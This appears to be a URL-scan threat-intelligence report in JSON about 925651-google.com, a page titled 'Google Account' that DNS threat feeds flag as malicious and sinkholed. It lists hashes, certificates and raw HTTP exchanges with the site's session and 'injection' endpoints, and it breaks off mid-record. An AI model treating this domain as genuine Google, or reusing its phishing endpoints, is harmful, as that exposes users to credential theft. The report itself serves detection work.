{"report_id":"09e01b62-a990-41f6-8737-8f5030a0d60a","version":6,"status":"done","tags":[],"date":"2026-04-21T09:03:18Z","url":{"schema":"https","addr":"925651-google.com/","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"172.67.189.5","port":0,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"final":{"url":{"schema":"https","addr":"925651-google.com/","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"title":"Google Account","dom":{"size":70063,"mime_type":"text/html; charset=utf-8","magic":"HTML document, Unicode text, UTF-8 text, with very long lines (361)","md5":"cae1a2ae0cf240cbf04ddeee33dda34a","sha1":"8ee42cb22fe745d9d971c03b075bff7edf54617c","sha256":"8b3742b0a74714658ec8e90d3f7f017191d6628c4a4763ada4b8a86ee4a65223","sha512":"5185d9da6e0abe32697620876c1a7d0a3f1e8b982f9c5af5f6219db2aecb85da9667812a21f5f592c640032569ca9689dd8fc188b277e2ccfc4f1819a86aa7f6","ssdeep":"1536:Y+HqNlxJlhslPsFDPzlX/6pgML4tRgl79DzJCrB1hr8ERAo:vvA8oN","tlshash":"2263a4ae79f320396913a03d5bbfa1053232a013a04acd50bd9cb2585fd4e5556fafec","dom_hash":"domhash1a5fb07aa298af3027a3d01168f297ca","first_seen":"","last_seen":"","times_seen":0,"resource_available":false,"data":null}},"submit":{"url":{"schema":"https","addr":"925651-google.com/","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"172.67.189.5","port":0,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"tags":null,"meta":null},"settings":{"access":"public","device_type":"desktop","expires_at":"2027-05-26T09:03:18Z","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0","referer":"","cookies":null,"exit_node":"z0yflva4pidy47h"},"stats":{"alert_count":{"ids":0,"urlquery":0,"analyzer":2}},"detection":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null},"summary":[{"fqdn":"925651-google.com","ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"domain_registered":"unknown","domain_rank":0,"first_seen":"No data","last_seen":"No data","alert_count":48,"request_count":24,"received_data":264350,"sent_data":11969,"comment":"","tags":null,"fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}]}],"files":null,"artifacts":{"windows_shortcuts":null,"files":null,"telegram":null,"pdfs":null,"clipboard":null},"sensors":{"ids":null,"analyzer":null,"urlquery":null},"javascript":{"script":[{"url":{"schema":"https","addr":"925651-google.com/","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":true,"md5":"6b13a0dc8b6ff6f6139c151f32600b34","sha1":"3fdfd89da0347ca84395869b946bacea8a04b877","sha256":"d71fd338cf4a8d087ee644af7abecac47838d13bb05776f1dc2de17a319a15ad","sha512":"5156ef6e3a2d3e39ee6a0b48b32ca742031426782c001cdaad745f7b4ff863608ee3b5f24a71f9cab571ab80dfe66f998e1c6d662fdf054233b20b533bdc3ba7","ssdeep":"","tlshash":"85d0a75f7241dd358ad9a12f626f5388383293229d0794412429b8605c24ea2517edc2","size":229,"data":"","first_seen":"2026-04-21T09:03:25.859987Z","last_seen":"2026-04-21T09:16:26.53121Z","times_seen":2,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":true,"md5":"dcc7f9a1eccb106773af5bc6c929d771","sha1":"cc0c88d196c36b6b33d1ec585f681a6f8a1e7313","sha256":"07d458482d4e77453f98a8d04874cced693e1bb6d733971f36323c95aec175b0","sha512":"b407e3e31838d4eb3e2448e1c3a6b43d490fa0339b9d00d92d758530aa9254bd0b7130f51cf9b75ebab48bf0a255ae7534e2fbe0a89b353e537a4e0c8f4a1056","ssdeep":"1536:3HqNlxJlhslPsFDPzlX/6pgML4tRgl79DzJCrB1hr8ERAx:RvA8oS","tlshash":"6e43c8ad79f321346923b03d5bbfa1453632a0136045da10bc5cb2282fd4f6957bafe9","size":57080,"data":"","first_seen":"2026-04-21T09:03:25.862238Z","last_seen":"2026-04-21T09:16:26.532132Z","times_seen":2,"alerts":{"ids":null,"analyzer":null,"urlquery":null}}],"eval":null,"write":null},"http":[{"url":{"schema":"https","addr":"925651-google.com/api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:15.572Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:03:15 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb36ea5fbb0883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=iW9R%2BTY5AVBUG4Bqox83B7xmPpfrOoH%2Fl6UtMUqzZZW8%2BeJ8dRoaihzv2AVeA%2B%2F1e7UU0czQrcDD8RGoZkcKO%2F2JauFUDcUHueUr73G%2FuSwYW6Iilk0i5VbFcRyUvC7EYSNlPuykVLfLvcC7QujMeCI%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":108,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":108,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:03.575Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:03 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb369f5cca0883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=Dq3H9LLIHckQXSimFaXI64WBkoHhhessNUQ995qthyyou56bz1AGf1czKQFmslI5WjznfVsk4S92m9w6%2BRfhWba%2BlS%2FXlRV0CZmsbPdnwMl9%2FpGnigxZnQhjOPAzEFGD0RJ65Mmjsw%2BqtP7e06dQveU%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":79,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":78,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:57.569Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 197\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":197,"data":"{\"id\":null,\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb3679c8930883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=Cs8h6SaQuq3FHyv9kZQb%2Fd8%2BQtHVjmGXUEYtjQgHA7UTzXZtsC138%2BiWflPgWyo%2BQ9MMEzk9tVnssZEE48F701tS6x6RQLXe8fbV1fTur8%2FRf3gT9I5wL0VABqvyLCbLtKKKHqQ6dOaqw3qmO0lTsa0%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":92,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":92,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:57.680Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb367a78a80883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=ROrHHBXn3%2B%2BSlwp0W%2BSs7GT1cdrHBccxUae6TW6xtsSomF6%2BjK%2FGQAn99o4YxyHgYPBSn4pjRP4lFehDwRBFyRE2L7RlFn3mCTLUFScB0Ei0ihJYiMgZlemmzf1ypaFBSXosf%2FaxhRSVB4lDBN7VrOA%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":106,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":105,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/images/favicon.ico","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:57.795Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /images/favicon.ico HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\nx-content-type-options: nosniff\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: image/x-icon\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb367b38bb0883-OSL\r\ncf-cache-status: MISS\r\npriority: u=6,i=?0\r\ncache-control: public, max-age=14400\r\nlast-modified: Tue, 21 Apr 2026 09:02:57 GMT\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=o6mJF6Tw33H95ATrXAAUKKppnALm2nTjmJRBnPP7i6PnkeS1ByY5LWNJyX9p%2FkWnNgxLamhSAZaerDYKJ514e16qG788HrBQx2IzFdE1M9mIn95NRhR4JmPKtNpPQwYTlXnKRz60xZ7G0HNTYR6%2FM%2BI%3D\"}]}\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":5430,"size_decoded":0,"mime_type":"image/x-icon","magic":"MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel","md5":"f3418a443e7d841097c714d69ec4bcb8","sha1":"49263695f6b0cdd72f45cf1b775e660fdc36c606","sha256":"6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770","sha512":"82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563","ssdeep":"48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B","tlshash":"65b1b8b7e6c63030c85805bc49373a6d1e1b6ee31a9cf064fecc326a1a320d175256be","first_seen":"2023-04-05T04:39:39Z","last_seen":"2026-04-21T12:22:03.130185Z","times_seen":78053,"resource_available":false,"data":null}},"time_used":87,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":86,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","se